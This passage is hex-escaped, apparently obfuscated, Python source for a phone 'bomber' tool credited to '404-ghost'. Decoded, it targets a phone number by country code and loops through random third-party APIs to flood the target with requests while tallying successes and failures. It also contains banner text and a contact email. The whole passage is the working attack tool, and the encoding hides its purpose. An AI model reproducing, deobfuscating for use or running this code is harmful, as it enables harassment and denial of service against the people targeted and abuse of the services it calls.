x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x21\x20\x41\x6c\x6c\x20\x41\x50\x49\x73\x20\x48\x61\x76\x65\x20\x45\x78\x70\x69\x72\x65\x64\x20\x50\x6c\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x20\x42\x6f\x6d\x62\x20\x4f\x72\x20\x52\x75\x6e\x20\x49\x74\x20\x41\x67\x61\x69\x6e\x2e\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x57\x65\x20\x41\x72\x65\x20\x53\x6f\x72\x72\x79\x20\x54\x6f\x20\x53\x61\x79\x20\x54\x68\x61\x74\x20\x42\x6f\x6d\x62\x69\x6e\x67\x20\x4c\x69\x6d\x69\x74\x20\x46\x6f\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x48\x61\x73\x20\x42\x65\x65\x6e\x20\x52\x65\x61\x63\x68\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x57\x65\x20\x41\x72\x65\x20\x57\x6f\x72\x6b\x69\x6e\x67\x20\x54\x6f\x6f\x20\x48\x61\x72\x64\x20\x54\x6f\x20\x49\x6e\x63\x72\x65\x61\x73\x65\x20\x54\x68\x65\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x20\x4c\x69\x6d\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x54\x68\x69\x73\x20\x77\x69\x6c\x6c\x20\x68\x65\x6c\x70\x20\x75\x73\x20\x74\x6f\x20\x67\x69\x76\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x20\x74\x6f\x20\x79\x6f\x75\x72\x20\x63\x6f\x75\x6e\x74\x72\x79\x20\x66\x61\x73\x74\x2e\x2e\x2e\x5c\x6e\x5c\x6e\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x69\x73\x20\x4e\x6f\x74\x20\x53\x75\x70\x70\x6f\x72\x74\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x50\x6c\x65\x61\x73\x65\x20\x53\x65\x6e\x64\x20\x41\x20\x4d\x61\x69\x6c\x20\x54\x6f\x20\x68\x61\x73\x61\x6e\x66\x69\x72\x6e\x61\x73\x32\x34\x32\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x20\x54\x6f\x20\x4c\x65\x74\x20\x55\x73\x20\x4b\x6e\x6f\x77\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x2b\x7b\x30\x7d\x20\x7b\x31\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x74\x72\x28\x63\x63\x29\x2c\x74\x61\x72\x67\x65\x74\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x53\x65\x6e\x74\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x75\x63\x63\x65\x73\x73\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x46\x61\x69\x6c\x65\x64\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x55\x73\x65\x20\x74\x68\x69\x73\x20\x4f\x6e\x6c\x79\x20\x66\x6f\x72\x20\x66\x75\x6e\x2c\x20\x6e\x6f\x74\x20\x66\x6f\x72\x20\x72\x65\x76\x65\x6e\x67\x65\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x6f\x6c\x6f\x72\x73\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x68\x69\x73\x20\x42\x6f\x6d\x62\x65\x72\x20\x57\x61\x73\x20\x43\x72\x65\x61\x74\x65\x64\x20\x42\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x74\x61\x72\x67\x65\x74\x2c\x61\x70\x69\x2c\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x73\x75\x6c\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x73\x75\x63\x63\x65\x73\x73\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x66\x61\x69\x6c\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x63\x68\x2e\x63\x6f\x75\x6e\x74\x28\x61\x70\x69\x29\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x2e\x72\x65\x6d\x6f\x76\x65\x28\x61\x70\x69\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x66\x6c\x6f\x61\x74\x28\x64\x65\x6c\x61\x79\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x25\x20\x33\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x57\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x42\x6f\x6d\x62\x69\x6e\x67\x20\x43\x6f\x6d\x70\x6c\x65\x74\x65\x64\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x66\x69\x72\x65\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x69\x6e\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x20\x2d\x20\x69\x6e\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x0a\x20\x20\x20\x20\x62\x6f\x6d\x62\x73\x20\x3d\x20\x69\x6e\x74\x28\x63\x6f\x75\x6e\x74\x65\x72\x29\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3c\x20\x28\x69\x6e\x74\x28\x62\x6f\x6d\x62\x73\x29\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x61\x70\x69\x20\x3d\x20\x31\x30\x33\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x70\x69\x20\x3d\x20\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x68\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x21\x20\x41\x6c\x6c\x20\x41\x50\x49\x73\x20\x48\x61\x76\x65\x20\x45\x78\x70\x69\x72\x65\x64\x20\x50\x6c\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x20\x42\x6f\x6d\x62\x20\x4f\x72\x20\x52\x75\x6e\x20\x49\x74\x20\x41\x67\x61\x69\x6e\x2e\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x57\x65\x20\x41\x72\x65\x20\x53\x6f\x72\x72\x79\x20\x54\x6f\x20\x53\x61\x79\x20\x54\x68\x61\x74\x20\x42\x6f\x6d\x62\x69\x6e\x67\x20\x4c\x69\x6d\x69\x74\x20\x46\x6f\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x48\x61\x73\x20\x42\x65\x65\x6e\x20\x52\x65\x61\x63\x68\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x57\x65\x20\x41\x72\x65\x20\x57\x6f\x72\x6b\x69\x6e\x67\x20\x54\x6f\x6f\x20\x48\x61\x72\x64\x20\x54\x6f\x20\x49\x6e\x63\x72\x65\x61\x73\x65\x20\x54\x68\x65\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x20\x4c\x69\x6d\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x54\x68\x69\x73\x20\x77\x69\x6c\x6c\x20\x68\x65\x6c\x70\x20\x75\x73\x20\x74\x6f\x20\x67\x69\x76\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x20\x74\x6f\x20\x79\x6f\x75\x72\x20\x63\x6f\x75\x6e\x74\x72\x79\x20\x66\x61\x73\x74\x2e\x2e\x2e\x5c\x6e\x5c\x6e\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x69\x73\x20\x4e\x6f\x74\x20\x53\x75\x70\x70\x6f\x72\x74\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x50\x6c\x65\x61\x73\x65\x20\x53\x65\x6e\x64\x20\x41\x20\x4d\x61\x69\x6c\x20\x54\x6f\x20\x68\x61\x73\x61\x6e\x66\x69\x72\x6e\x61\x73\x32\x34\x32\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x20\x54\x6f\x20\x4c\x65\x74\x20\x55\x73\x20\x4b\x6e\x6f\x77\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x2b\x7b\x30\x7d\x20\x7b\x31\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x74\x72\x28\x63\x63\x29\x2c\x74\x61\x72\x67\x65\x74\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x53\x65\x6e\x74\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x75\x63\x63\x65\x73\x73\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x46\x61\x69\x6c\x65\x64\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x55\x73\x65\x20\x74\x68\x69\x73\x20\x4f\x6e\x6c\x79\x20\x66\x6f\x72\x20\x66\x75\x6e\x2c\x20\x6e\x6f\x74\x20\x66\x6f\x72\x20\x72\x65\x76\x65\x6e\x67\x65\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x6f\x6c\x6f\x72\x73\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x68\x69\x73\x20\x42\x6f\x6d\x62\x65\x72\x20\x57\x61\x73\x20\x43\x72\x65\x61\x74\x65\x64\x20\x42\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x